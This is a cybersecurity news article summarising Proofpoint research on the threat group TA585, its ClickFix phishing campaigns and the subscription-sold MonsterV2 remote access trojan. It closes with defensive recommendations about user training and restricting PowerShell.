A newly identified cybercriminal group, TA585, has been uncovered by cybersecurity researchers for running one of the most autonomous and technically advanced operations in today’s threat landscape.
Unlike many groups that rent access or outsource delivery, TA585 controls its own infrastructure, phishing operations and malware deployment.
A Powerful Malware Tool
Discovered by the Proofpoint team, TA585 is a key distributor of MonsterV2, a premium malware family first advertised on underground forums in February 2025.
Marketed as a remote access Trojan (RAT), stealer and loader, MonsterV2 gives criminals the ability to steal data, monitor victims and install additional payloads.
Proofpoint noted that the malware avoids systems located in Commonwealth of Independent States (CIS) countries and is sold on a subscription basis.
The “Standard” version costs $800 per month, while the “Enterprise” edition, which includes additional modules such as HVNC and Chrome Developer Tools access, is priced at $2000 per month.
Sophisticated Delivery and Filtering
TA585’s early campaigns appeared in February 2025, masquerading as communications from the Internal Revenue Service (IRS) and Small Business Administration (SBA). These messages used the ClickFix technique, a social engineering method that persuades users to execute a PowerShell script manually. Doing so triggered a second script that ultimately installed MonsterV2.
Unlike most threat actors that rely on external brokers or botnets, TA585 uses compromised websites to host malicious JavaScript.
Visitors are shown a fake CAPTCHA overlay prompting them to verify they are human. Behind the scenes, TA585’s systems run detailed filtering checks to ensure genuine user engagement before delivering the malware.
Read more on malware delivery trends: Malware-as-a-Service Campaign Exploits GitHub to Deliver Payloads
Expanding Attack Channels
The group’s activity broadened later in 2025 with a GitHub-themed campaign that exploited the platform’s notification system.
By tagging legitimate users in fake security alerts, TA585 lured victims to actor-controlled sites that mimicked GitHub’s interface and once again relied on the ClickFix method. Some of these attacks distributed other malware, including Rhadamanthys.
MonsterV2 itself is written in C++, Go and TypeScript, and features robust encryption and self-protection measures.
Proofpoint’s analysis highlighted several key functions and capabilities, including:
-
Data theft, including credentials, crypto wallets and browser information
-
Remote desktop control through HVNC
-
Webcam recording and screenshot capture
-
Downloading and executing additional payloads
Proofpoint researchers also observed ongoing development, with the malware receiving frequent updates and minor fixes, such as corrected typos in newer builds.
“[We] anticipate we will continue to see new malware families emerge, many of which contain a variety of capabilities baked into one malware,” the firm warned.
“[We] recommend training users to recognize the ClickFix technique and to prevent non-administrative users from executing PowerShell.”
